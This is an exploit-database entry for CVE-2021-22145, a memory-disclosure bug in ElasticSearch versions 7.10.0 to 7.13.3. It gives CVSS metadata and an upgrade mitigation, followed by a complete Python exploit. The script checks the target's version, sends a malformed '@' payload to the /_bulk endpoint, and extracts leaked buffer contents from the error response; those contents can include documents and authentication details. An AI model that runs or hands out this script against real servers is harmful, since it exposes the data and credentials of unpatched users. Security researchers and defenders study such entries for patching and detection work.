header-logo
Suggest Exploit
vendor:
ElasticSearch
by:
r0ny
6,5
CVSS
MEDIUM
Memory disclosure
200
CWE
Product Name: ElasticSearch
Affected Version From: 7.10.0
Affected Version To: 7.13.3
Patch Exists: YES
Related CWE: CVE-2021-22145
CPE: elasticsearch
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=22145https://www.infosecmatter.com/nessus-plugin-library/?id=23772https://www.infosecmatter.com/nessus-plugin-library/?id=22954https://www.infosecmatter.com/nessus-plugin-library/?id=22114https://www.infosecmatter.com/nessus-plugin-library/?id=22138https://www.infosecmatter.com/nessus-plugin-library/?id=22162https://www.infosecmatter.com/nessus-plugin-library/?id=22137https://www.infosecmatter.com/nessus-plugin-library/?id=22121https://www.infosecmatter.com/nessus-plugin-library/?id=22105https://www.infosecmatter.com/nessus-plugin-library/?id=23892
Tags: cve,cve2021,elasticsearch,packetstorm
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Nuclei References: https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yamlhttps://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.htmlhttps://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177https://nvd.nist.gov/vuln/detail/CVE-2021-22145https://security.netapp.com/advisory/ntap-20210827-0006/
Nuclei Metadata: {'max-request': 1, 'vendor': 'elastic', 'product': 'elasticsearch'}
Platforms Tested: Kali Linux
2021

ElasticSearch 7.13.3 – Memory disclosure

ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.

Mitigation:

Upgrade to ElasticSearch version 7.13.4 or later.
Source

Exploit-DB raw data:

# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure 
# Date: 21/07/2021
# Exploit Author: r0ny
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://github.com/elastic/elasticsearch
# Version: 7.10.0 to 7.13.3
# Tested on: Kali Linux
# CVE : CVE-2021-22145

#/usr/bin/python3

from argparse import ArgumentParser
import requests
from packaging import version
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print("\n################################################################################################")
print("######    CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3)    ######")
print("######                     Exploit by r0ny (https://twitter.com/_r0ny)                    ######")
print("################################################################################################\n")
parser = ArgumentParser()
parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service")
parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="")
parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="")
args = parser.parse_args()

if not (args.url):
    parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"')

#Prepare authentication header
authorization_header = "" 
if(args.api_key or args.basic):
    authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic

#Check elasticsearch version
r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False)
try:
	es_version = json.loads(r.content)["version"]["number"]
except:
	print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n")
	print("# Server response: " + str(r.content))
	exit()

if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"):
	print("# Elastic Service not vulnerable")
	print("# Elastic Service version: " + es_version) 
	print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3") 	
	exit()

#Prepare exploitation	
payload = "@\n"
vulnerable_endpoint = "/_bulk"
url = args.url + vulnerable_endpoint

#Exploitation
print("# ElasticSearch Version: " + es_version)
print("# Request to " + url+"\n")
r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False)

#Read Memory Leak and remove stacktrace

print("$$$$$$$$$$$$$$$$$$$$$$$$$")
print("$$$$$ Memory Leaked $$$$$")
print("$$$$$$$$$$$$$$$$$$$$$$$$$\n")
response = json.loads(r.content)
leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0]
leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0]
print(leak1+"\n"+leak2)

Navigation

Suggest Exploit

Services By CQR